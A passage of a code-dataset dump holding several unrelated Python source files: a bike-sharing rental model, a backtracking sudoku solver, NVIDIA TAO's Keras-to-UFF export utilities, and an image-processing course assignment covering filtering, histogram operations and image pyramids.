station_closer_than_Xm:\n self.bike.current_station = station_closer_than_Xm\n self.end_station = station_closer_than_Xm\n self.save()\n else:\n self.bike.current_station = None\n\n # set Bike status back to available\n self.bike.availability_status = Bike.Availability.AVAILABLE\n self.bike.save()\n try:\n # set new non static bike ID, so for GBFS observers can not track this bike\n self.bike.non_static_bike_uuid = uuid.uuid4()\n self.bike.save()\n except IntegrityError:\n # Congratulations! 
The 2^64 chance of uuid4 collision has happend.\n # here could be the place for the famous comment: \"should never happen\"\n # So we catch this error, but don't handle it,\n # because don't rotating a uuid every 18,446,744,073,709,551,615 rents is ok\n pass\n\n if self.bike.state == Bike.State.MISSING:\n data = {}\n if self.end_location:\n data = {\"location_id\": self.end_location.id}\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n if self.end_station:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.station\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"station_id\": self.end_station.id,\n **({\"forced\": True} if force else {}),\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.freefloat\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"location_id\": getattr(self.end_location, \"id\", None),\n **({\"forced\": True} if force else {}),\n },\n )\n\n\n@receiver(models.signals.post_save, sender=Rent)\ndef rent_started(sender, instance, created, *args, **kwargs):\n # only interested in the first save\n if not created:\n return\n if instance.start_station:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.station\",\n data={\n \"rent_id\": instance.id,\n \"station_id\": instance.start_station.id,\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.freefloat\",\n data={\n \"rent_id\": instance.id,\n \"location_id\": getattr(instance.start_location, \"id\", None),\n },\n )\n","repo_name":"transportkollektiv/cykel","sub_path":"bikesharing/models/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"53"} +{"seq_id":"26988227943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 11:54:26 2019\n\n@author: khushboogoyal\n\"\"\"\n\n\"\"\"this is the fucntion which check whether the board is full or not \nand return true and false, if it finds aleast one zero on the board\"\"\"\n\nimport time, os , psutil\ncount = 0\n\ndef BoradisFull(board):\n \n for x in range(0,9):\n for y in range(0,9):\n if board[x][y] == 0:\n \n return False\n \n\n print(\"board is filled\")\n \n return True\n\n \n print(\"board is yet to be solved\")\n \n\n\ndef possibleEntry(board , i, j):\n \n k=0\n l = 0\n \n \n \n \"\"\"this is the list to fill possible Array\"\"\"\n possibleArray = {}\n for x in range (1, 10):\n \n possibleArray[x] = 0\n #print('count is----',count) \n \n # for horizontal values\n for y in range (0, 9):\n \n if not board[i][y] == 0: \n \n possibleArray[board[i][y]] = 1\n \n # for vertical values\n \n for x in range (0, 9):\n if not board[x][j] == 0: \n possibleArray[board[x][j]] = 1\n \n #For squares\n\n # for i\n if i >= 0 and i <= 2:\n k = 0\n elif i >= 3 and i <= 5:\n k = 3\n else:\n k = 6\n \n # now for j\n if j >= 0 and j <= 2:\n l = 0\n elif j >= 3 and j <= 5:\n l = 3\n else:\n l = 6\n for x in range (k, k + 3):\n for y in range (l, l + 3):\n if not board[x][y] == 0:\n possibleArray[board[x][y]] = 1 \n \n for x in range (1, 10):\n if possibleArray[x] == 0:\n possibleArray[x] = x\n else:\n 
possibleArray[x] = 0\n \n return possibleArray\n\n\ndef printBoard(board):\n print(\"*********************\")\n for x in range(0, 9):\n if x == 3 or x == 6:\n print(\"*********************\")\n for y in range(0, 9):\n if y == 3 or y == 6:\n print(\"*\", end=\" \")\n print(board[x][y], end=\" \")\n print()\n print(\"*********************\")\n \n \ndef sudokuSolver(board):\n \n i = 0\n j = 0\n \n possiblity = {}\n global count; count += 1\n # function to check full board if in case and return board\n if BoradisFull(board):\n \n printBoard(board)\n print(\"Board Solved Successfully!\")\n \n return\n \n else:\n # check the first blank spot\n for x in range (0, 9):\n for y in range (0, 9):\n if board[x][y] == 0:\n # now i and j holds the value of x and y\n i = x\n j = y\n \n break\n else:\n continue\n break\n \n \n # get all the possibilities for i,j\n possiblity = possibleEntry(board, i, j)\n #print(possiblity)\n \n # go through all the possibilities and call the the function\n # again and again\n \n \n for x in range (1, 10):\n \n if not possiblity[x] == 0:\n board[i][j] = possiblity[x]\n \n #check again whole program\n sudokuSolver(board)\n\n \n \n \n # backtrack and it reset the particular step to 0\n board[i][j] = 0 \n \n \n \ndef main():\n \n start = time.time()\n grid=[[0 for x in range(9)]for y in range(9)] \n \n # assigning values to the grid \n #grid=[[0,0,0,0,0,9,0,0,5],\n # [0,0,9,1,0,0,0,0,7],\n # [8,0,0,0,0,3,0,0,4],\n # [9,6,0,0,0,1,8,0,0],\n # [0,0,0,0,0,0,0,0,0],\n # [0,0,2,6,0,0,0,5,1],\n #[3,0,0,9,0,0,0,0,2],\n #[1,0,0,0,0,2,3,0,0],\n #[7,0,0,4,0,0,0,0,0]]\n \n grid=[[4,0,0,0,0,5,0,0,0],\n [0,9,0,0,6,0,0,0,0],\n [6,0,0,0,2,0,4,8,0],\n [0,8,0,0,0,7,0,6,4],\n [0,5,9,0,0,0,8,3,0],\n [7,6,0,9,0,0,0,5,0],\n [0,7,5,0,4,0,0,0,8],\n [0,0,0,0,7,0,0,4,0],\n [0,0,0,1,0,0,0,0,2]]\n \n \n \n \n print(\"Board is yet to be filled\")\n printBoard(grid)\n sudokuSolver(grid)\n print('number of iterations',count)\n end = time.time()\n print(\"Time to run: {}\".format(end - start))\n \n \n \nif __name__ == \"__main__\":\n \n pid=os.getpid()\n \n ps= psutil.Process(pid)\n memoryUse = ps.memory_info()\n \n print(\"memory\", memoryUse.vms)\n main()\n\n\n\n\n\n","repo_name":"Khushgoyal/suduko_backtracking","sub_path":"backtracking_sudoku.py","file_name":"backtracking_sudoku.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20610974961","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport tempfile\n\nimport keras\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\n\nfrom tensorflow.core.protobuf import saver_pb2\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.training import saver as saver_lib\nimport uff\nfrom uff.model.utils import convert_to_str\n\n\n\"\"\"Logger for UFF export APIs.\"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef _reload_model_for_inference(model, custom_objects=None):\n \"\"\"Reload a model specifically for doing inference.\n\n In order to export a model we need remove training-specific\n parts of the graph. For example, BatchNormalization layers\n may feature conditional branching to do training and inference\n alternately. 
This confused the UFF export tool.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to reload in inference mode.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n A model that can be used for inference only.\n \"\"\"\n # Save model to a temp file so we can reload it later.\n os_handle, tmp_model_file_name = tempfile.mkstemp(suffix=\".h5\")\n os.close(os_handle)\n model.save(tmp_model_file_name)\n\n # Make sure Keras session is clean and tuned for inference.\n keras.backend.clear_session()\n keras.backend.set_learning_phase(0)\n\n @classmethod\n def apply_fused_padding(cls, tf_node, inputs, tf_nodes):\n tf_padding = convert_to_str(tf_node.attr[\"padding\"].s)\n padding = None\n fields = {}\n if tf_padding == \"SAME\":\n fields[\"implicit_padding\"] = \"same\"\n elif tf_padding == \"VALID\":\n fields[\"implicit_padding\"] = None\n tf_lhs_node = tf_nodes[inputs[0]]\n if tf_lhs_node.op == \"Pad\":\n tf_padding_node = tf_nodes[tf_lhs_node.input[1]]\n p = cls.convert_tf2numpy_const_node(tf_padding_node)\n before, after = p[:, 0].tolist(), p[:, 1].tolist()\n if before == after:\n padding = before\n inputs[0] = tf_lhs_node.input[0]\n if tf_nodes[inputs[0]].op == \"Identity\":\n logger.info(\"Modulus patch identity layer in padding inputs.\")\n inputs[0] = tf_nodes[inputs[0]].input[0]\n else:\n raise ValueError(\"Padding mode %s not supported\" % tf_padding)\n return inputs, padding, fields\n\n def compose_call(prev_call_method):\n def call(self, inputs, training=False):\n return prev_call_method(self, inputs, training)\n\n return call\n\n def dropout_patch_call(self, inputs, training=False):\n # Just return the input tensor. 
Keras will map this to ``keras.backend.identity``,\n # which the TensorRT 3.0 UFF parser supports.\n return inputs\n\n # Patch BatchNormalization and Dropout call methods so they don't create\n # the training part of the graph.\n prev_batchnorm_call = keras.layers.normalization.BatchNormalization.call\n prev_dropout_call = keras.layers.Dropout.call\n\n logger.debug(\"Patching keras BatchNormalization...\")\n keras.layers.normalization.BatchNormalization.call = compose_call(\n prev_batchnorm_call\n )\n\n logger.debug(\"Patching keras Dropout...\")\n keras.layers.Dropout.call = dropout_patch_call\n\n logger.debug(\"Patching UFF TensorFlow converter apply_fused_padding...\")\n uff.converters.tensorflow.converter.TensorFlowToUFFConverter.apply_fused_padding = (\n apply_fused_padding\n )\n\n # Reload the model.\n model = keras.models.load_model(\n tmp_model_file_name, compile=False, custom_objects=custom_objects\n )\n\n # Unpatch Keras.\n logger.debug(\"Unpatching keras BatchNormalization layer...\")\n keras.layers.normalization.BatchNormalization.call = prev_batchnorm_call\n\n logger.debug(\"Unpatching keras Dropout layer...\")\n keras.layers.Dropout.call = prev_dropout_call\n\n # Delete temp file.\n os.remove(tmp_model_file_name)\n\n return model\n\n\ndef keras_to_pb(model, output_filename, output_node_names, custom_objects=None):\n \"\"\"Export a Keras model to Protobuf format.\n\n The Protobuf format is a TensorFlow-specific representation\n of the model.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If None, then the model output layers are used as output nodes.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. 
If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n \"\"\"\n model = _reload_model_for_inference(model, custom_objects=custom_objects)\n\n layers_with_external_state_io = [\n layer for layer in model.layers if hasattr(layer, \"is_stateful\")\n ]\n\n def get_layer_name(layer):\n _layer_outputs = layer.get_output_at(0)\n if isinstance(_layer_outputs, list):\n return [lo.name.split(\":\")[0] for lo in _layer_outputs]\n return _layer_outputs.name.split(\":\")[0]\n\n # Get names of input and output nodes.\n in_tensors = model.inputs\n in_tensor_shape = keras.backend.int_shape(in_tensors[0])\n in_name = in_tensors[0].op.name\n\n if layers_with_external_state_io:\n in_name = [in_name]\n in_tensor_shape = [in_tensor_shape]\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n in_name.append(layer.state_input_name)\n else:\n # Add feature maps of past frames for stateless models\n in_name.extend(layer._past_feature_names)\n shape = layer.input_shape\n shape = shape if shape[0] is None or isinstance(shape[0], int) else shape[0]\n in_tensor_shape.append(shape)\n\n if output_node_names is None:\n output_node_names = [t.op.name for t in model.outputs]\n\n # Replace the sliced output node with original output layers. For example, an output node\n # named `sliced_output_cov/Sigmoid` will be replaced with `output_cov/Sigmoid`\n layer_output_names = [get_layer_name(layer) for layer in model.layers]\n original_output_names = []\n for name in output_node_names:\n # For each sliced output node, search its original node by name and use the original\n # node to replace the sliced output node.\n if name.startswith(\"sliced_output_\"):\n original_output_name_prefix = name.split(\"/\")[0][7:]\n original_output_names += [\n output_name\n for output_name in layer_output_names\n if output_name.startswith(original_output_name_prefix)\n ]\n else:\n original_output_names.append(name)\n output_node_names = original_output_names\n\n # Add output node names for the recurrent layers,\n # to handle the state external to TRT model.\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n temporal_output_node_name = get_layer_name(layer)\n else:\n temporal_output_node_name = layer.get_input_at(0).name.split(\":\")[0]\n if temporal_output_node_name not in output_node_names:\n output_node_names.append(temporal_output_node_name)\n\n # Freeze model.\n sess = keras.backend.get_session()\n\n # TensorFlow freeze_graph expects a comma separated string of output node names.\n output_node_names_tf = \",\".join(output_node_names)\n\n saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)\n\n # Save the checkpoint file to a temporary location.\n os_handle, tmp_ckpt_file_name = tempfile.mkstemp(suffix=\".ckpt\")\n os.close(os_handle)\n checkpoint_path = saver.save(sess, tmp_ckpt_file_name)\n graph_io.write_graph(sess.graph, \".\", output_filename)\n freeze_graph.freeze_graph(\n input_graph=output_filename,\n input_saver=\"\",\n input_binary=False,\n input_checkpoint=checkpoint_path,\n output_node_names=output_node_names_tf,\n restore_op_name=\"save/restore_all\",\n filename_tensor_name=\"save/Const:0\",\n output_graph=output_filename,\n clear_devices=False,\n initializer_nodes=\"\",\n )\n\n # Clean up.\n os.remove(tmp_ckpt_file_name)\n\n return in_name, output_node_names, in_tensor_shape\n\n\ndef pb_to_uff(input_filename, output_filename, out_names, text=False, quiet=True):\n \"\"\"Convert a TensorFlow model to UFF.\n\n The input model needs to be passed 
as a frozen Protobuf file.\n The export UFF model may be parsed and optimized by TensorRT.\n\n Args:\n input_filename (str): path to protobuf file.\n output_filename (str): file to write exported model to.\n out_names (list of str): list of the names of the output nodes.\n text (boolean): whether to save .pbtxt file.\n quiet (boolean): whether to enable quiet mode.\n \"\"\"\n uff.from_tensorflow_frozen_model(\n input_filename,\n out_names,\n output_filename=output_filename,\n text=text,\n quiet=quiet,\n )\n\n\ndef keras_to_uff(model, output_filename, output_node_names=None, custom_objects=None):\n \"\"\"Export a Keras model to UFF format.\n\n UFF stands for Universal Framework Format and is an NVIDIA\n TensorRT file format for storing a neural network's topology and\n weights.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If not provided, then the last layer is assumed to be the output node.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n\n These must be passed to the TensorRT optimization tool to identify input and output blobs.\n \"\"\"\n # First, convert model to a temporary TensorFlow Protobuf.\n if check_for_quantized_layers(model):\n calib_json = output_filename + \".json\"\n model, _ = process_quantized_layers(model, \"uff\", calib_json=calib_json)\n\n os_handle, tmp_pb_file_name = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n in_tensor_name, out_tensor_names, in_tensor_shapes = keras_to_pb(\n model, tmp_pb_file_name, output_node_names, custom_objects=custom_objects\n )\n\n # Second, convert protobuf to UFF.\n pb_to_uff(tmp_pb_file_name, output_filename, out_tensor_names)\n\n # Clean up.\n os.remove(tmp_pb_file_name)\n\n # Return a string instead of a list if there is only one output node.\n if len(out_tensor_names) == 1:\n out_tensor_names = out_tensor_names[0]\n\n return in_tensor_name, out_tensor_names, in_tensor_shapes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/export/_uff.py","file_name":"_uff.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"7745681467","text":"import numpy as np\nfrom skimage import io\nimport os.path as osp\n\ndef load_image(file_name):\n \"\"\"\n Load image from disk\n :param file_name:\n :return: image: numpy.ndarray\n \"\"\"\n if not osp.exists(file_name):\n print('{} not exist'.format(file_name))\n return\n image = np.asarray(io.imread(file_name))\n if len(image.shape)==3 and image.shape[2]>3:\n image = image[:, :, :3]\n # print(image.shape) #should be (x, x, 3)\n return image\n\ndef save_image(image, 
file_name):\n \"\"\"\n Save image to disk\n :param image: numpy.ndarray\n :param file_name:\n :return:\n \"\"\"\n io.imsave(file_name,image)\n\ndef cs4243_resize(image, new_width, new_height):\n \"\"\"\n 5 points\n Implement the algorithm of nearest neighbor interpolation for image resize,\n Please round down the value to its nearest interger, \n and take care of the order of image dimension.\n :param image: ndarray\n :param new_width: int\n :param new_height: int\n :return: new_image: numpy.ndarray\n \"\"\"\n new_image = np.zeros((new_height, new_width, 3), dtype='uint8')\n if len(image.shape)==2:\n new_image = np.zeros((new_height, new_width), dtype='uint8')\n \n # ============= Your code here ============= #\n # Map each pixel in the new image with a pixel in the old image\n mapped_indices_i = np.floor(np.arange(new_height) * image.shape[0] / new_height).astype(np.int)\n mapped_indices_j = np.floor(np.arange(new_width) * image.shape[1] / new_width).astype(np.int)\n \n for i in range(new_height):\n for j in range(new_width):\n new_image[i, j] = image[mapped_indices_i[i], mapped_indices_j[j]]\n # ========================================= #\n return new_image\n\ndef cs4243_rgb2grey(image):\n \"\"\"\n 5 points\n Implement the rgb2grey function, use the\n weights for different channel: (R,G,B)=(0.299, 0.587, 0.114)\n Please scale the value to [0,1] by dividing 255\n :param image: numpy.ndarray\n :return: grey_image: numpy.ndarray\n \"\"\"\n if len(image.shape) != 3:\n print('RGB Image should have 3 channels')\n return\n \n # ============= Your code here ============= #\n # Matrix mult of image (Hi, Wi, 3) and weights (3, 1) ==> new image of (Hi, Wi, 1)\n weights = np.array([0.299, 0.587, 0.114])\n image = np.dot(image, weights)\n # ========================================= #\n\n return image/255.\n\ndef cs4243_histnorm(image, grey_level=256):\n \"\"\"\n 5 points \n Stretch the intensity value to [0, 255]\n :param image : ndarray\n :param grey_level\n :return res_image: hist-normed image\n Tips: use linear normalization here https://en.wikipedia.org/wiki/Normalization_(image_processing)\n \"\"\"\n res_image = image.copy()\n \n # ============= Your code here ============= #\n # Get global min and max intensity value\n min_level = res_image.min()\n max_level = res_image.max()\n \n # Normalizes the intensity values to [0, grey_level - 1]\n res_image = (res_image - min_level) / (max_level - min_level) * (grey_level - 1)\n # ========================================= #\n \n return res_image\n\n\n\ndef cs4243_histequ(image, grey_level=256):\n \"\"\"\n 10 points\n Apply histogram equalization to enhance the image.\n the cumulative histogram will aso be returned and used in the subsequent histogram matching function.\n :param image: numpy.ndarray(float64)\n :return: ori_hist: histogram of original image\n :return: cum_hist: cumulated hist of original image, pls normalize it with image size.\n :return: res_image: image after being applied histogram equalization.\n :return: uni_hist: histogram of the enhanced image.\n Tips: use numpy buildin funcs to ease your work on image statistics\n \"\"\"\n # ============= Your code here ============= #\n ori_hist = np.histogram(image, grey_level, (0, grey_level - 1))[0]\n cum_hist = np.cumsum(ori_hist) / (image.shape[0] * image.shape[1])\n uniform_hist = (grey_level - 1) * cum_hist\n # ========================================= #\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = image.shape\n res_image = 
np.zeros(image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = uniform_hist[image[i,j]]\n \n uni_hist = np.bincount(res_image.flatten(), minlength=grey_level)\n return ori_hist, cum_hist, res_image, uni_hist\n \ndef cs4243_histmatch(ori_image, refer_image):\n \"\"\"\n 10 points\n Map value according to the difference between cumulative histogram.\n Note that the cum_hists of the two images can be very different. It is possible\n that a given value cum_hist[i] != cum_hist[j] for all j in [0,255]. In this case, please\n map to the closest value instead. if there are multiple intensities meet the requirement,\n choose the smallest one.\n :param ori_image #image to be processed\n :param refer_image #image of target gray histogram \n :return: ori_hist: histogram of original image\n :return: ref_hist: histogram of reference image\n :return: res_image: image after being applied histogram matching.\n :return: res_hist: histogram of the enhanced image.\n Tips: use cs4243_histequ to help you\n \"\"\"\n \n # ============= Your code here ============= #\n def find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n\n # Get PDF, CDF for original and ref images (x_axis = intensity val, y_axis = cumulative density)\n grey_level = 256\n ori_hist, cum_hist_ori, _, _ = cs4243_histequ(ori_image, grey_level)\n ref_hist, cum_hist_ref, _, _ = cs4243_histequ(refer_image, grey_level)\n\n # Get proportion to intensity value mapping of refer image\n p2i_ref = {}\n for intensity_val, proportion in enumerate(cum_hist_ref):\n if proportion not in p2i_ref:\n p2i_ref[proportion] = intensity_val\n\n map_value = np.zeros(grey_level, dtype='uint8')\n for intensity_val, proportion in enumerate(cum_hist_ori):\n if proportion not in p2i_ref:\n # Find the nearest value if there is no exact match\n proportion = find_nearest(cum_hist_ref, proportion)\n\n map_value[intensity_val] = p2i_ref[proportion]\n # ========================================= #\n \n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist\n\n\ndef cs4243_rotate180(kernel):\n \"\"\"\n Rotate the matrix by 180. \n Can utilize build-in Funcs in numpy to ease your work\n :param kernel:\n :return:\n \"\"\"\n kernel = np.flip(np.flip(kernel, 0),1)\n return kernel\n\ndef cs4243_gaussian_kernel(ksize, sigma):\n \"\"\"\n 5 points\n Implement the simplified Gaussian kernel below:\n k(x,y)=exp(((x-x_mean)^2+(y-y_mean)^2)/(-2sigma^2))\n Make Gaussian kernel be central symmentry by moving the \n origin point of the coordinate system from the top-left\n to the center. Please round down the mean value. 
In this assignment,\n we define the center point (cp) of even-size kernel to be the same as that of the nearest\n (larger) odd size kernel, e.g., cp(4) to be same with cp(5).\n :param ksize: int\n :param sigma: float\n :return kernel: numpy.ndarray of shape (ksize, ksize)\n \"\"\"\n kernel = np.zeros((ksize, ksize))\n \n # ============= Your code here ============= #\n x_mean = y_mean = ksize // 2\n for i in range(ksize):\n for j in range(ksize):\n kernel[i, j] = np.exp(((i - x_mean) ** 2 + (j - y_mean) ** 2) / (-2 * (sigma ** 2)))\n # ========================================= #\n\n return kernel / kernel.sum()\n\ndef cs4243_filter(image, kernel):\n \"\"\"\n 10 points\n Implement the convolution operation in a naive 4 nested for-loops,\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return:\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n \n # Implement convolution operation using L3 slide 29\n for i in range(Hi):\n for j in range(Wi):\n x_ij = 0\n for u in range(-kernel_center_i, kernel_center_i + 1):\n for v in range(-kernel_center_j, kernel_center_j + 1):\n img_i = i - u\n img_j = j - v\n knl_i = kernel_center_i + u\n knl_j = kernel_center_j + v\n\n if img_i < 0 or img_i >= Hi or img_j < 0 or img_j >= Wi:\n continue\n\n f_uv = kernel[knl_i, knl_j]\n p_ij = image[img_i, img_j]\n x_ij += f_uv * p_ij\n\n filtered_image[i, j] = x_ij\n # ========================================= #\n\n return filtered_image\n\ndef pad_zeros(image, pad_height, pad_width):\n \"\"\"\n Pad the image with zero pixels, e.g., given matrix [[1]] with pad_height=1 and pad_width=2, obtains:\n [[0 0 0 0 0]\n [0 0 1 0 0]\n [0 0 0 0 0]]\n :param image: numpy.ndarray\n :param pad_height: int\n :param pad_width: int\n :return padded_image: numpy.ndarray\n \"\"\"\n height, width = image.shape\n new_height, new_width = height+pad_height*2, width+pad_width*2\n padded_image = np.zeros((new_height, new_width))\n padded_image[pad_height:new_height-pad_height, pad_width:new_width-pad_width] = image\n return padded_image\n\ndef cs4243_filter_fast(image, kernel):\n \"\"\"\n 10 points\n Implement a fast version of filtering algorithm.\n take advantage of matrix operation in python to replace the \n inner 2-nested for loops in filter function.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n kernel = cs4243_rotate180(kernel)\n \n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n filtered_image[i, j] = np.sum(target * kernel)\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_filter_faster(image, kernel):\n \"\"\"\n 10 points\n Implement a faster version of filtering algorithm.\n Pre-extract all the regions of kernel size,\n and obtain a matrix of shape (Hi*Wi, Hk*Wk),also reshape the flipped\n kernel to be of shape (Hk*Wk, 1), then do matrix multiplication, and rehshape back\n to get the final output image.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You 
may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel = cs4243_rotate180(kernel).flatten()\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n \n regions = []\n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n regions.append(target)\n regions = np.array(regions).reshape((Hi*Wi, Hk*Wk)) \n filtered_image = np.dot(regions, kernel).reshape((Hi, Wi))\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_downsample(image, ratio):\n \"\"\"\n Downsample the image to its 1/(ratio^2),which means downsample the width to 1/ratio, and the height 1/ratio.\n for example:\n A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n B = downsample(A, 2)\n B=[[1, 3], [7, 9]]\n :param image:numpy.ndarray\n :param ratio:int\n :return:\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n return image[0:height:ratio, 0:width:ratio]\n\ndef cs4243_upsample(image, ratio):\n \"\"\"\n upsample the image to its 2^ratio, \n :param image: image to be upsampled\n :param kernel: use same kernel to get approximate value for additional pixels\n :param ratio: which means upsample the width to ratio*width, and height to ratio*height\n :return res_image: upsampled image\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n new_width, new_height = width*ratio, height*ratio\n res_image = np.zeros((new_height, new_width))\n res_image[0:new_height:ratio, 0:new_width:ratio] = image\n return res_image\n\n\ndef cs4243_gauss_pyramid(image, n=3):\n \"\"\"\n 10 points\n build a Gaussian Pyramid of level n\n :param image: original grey scaled image\n :param n: level of pyramid\n :return pyramid: list, with list[0] corresponding to original image.\n\t:e.g., img0->blur&downsample->img1->blur&downsample->img2\t\n Tips: you may need to call cs4243_gaussian_kernel() and cs4243_filter_faster()\n\tThe kernel for blur is given, do not change it.\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n \n # ============= Your code here ============= #\n pyramid.append(image)\n for i in range(n):\n temp_image = cs4243_filter_faster(pyramid[i], kernel)\n temp_image = cs4243_downsample(temp_image, 2)\n pyramid.append(temp_image)\n # ========================================= #\n \n return pyramid\n\ndef cs4243_lap_pyramid(gauss_pyramid):\n \"\"\"\n 10 points\n build a Laplacian Pyramid from the corresponding Gaussian Pyramid\n :param gauss_pyramid: list, results of cs4243_gauss_pyramid\n :return lap_pyramid: list, with list[0] corresponding to image at level n-1 in Gaussian Pyramid.\n\tTips: The kernel for blurring during upsampling is given, you need to scale its value following the standard pipeline in laplacian pyramid.\n \"\"\"\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n \n # ============= Your code here ============= #\n kernel = kernel * 4.0\n\n for i in reversed(range(n-1)):\n curr_lvl = gauss_pyramid[i+1]\n curr_lvl = cs4243_upsample(curr_lvl, 2)\n curr_lvl = cs4243_filter_faster(curr_lvl, kernel)\n\n prev_lvl = gauss_pyramid[i]\n lap_pyramid.append(prev_lvl - curr_lvl)\n # ========================================= #\n \n return lap_pyramid\n \ndef cs4243_Lap_blend(A, B, mask):\n \"\"\"\n 10 points\n blend image with 
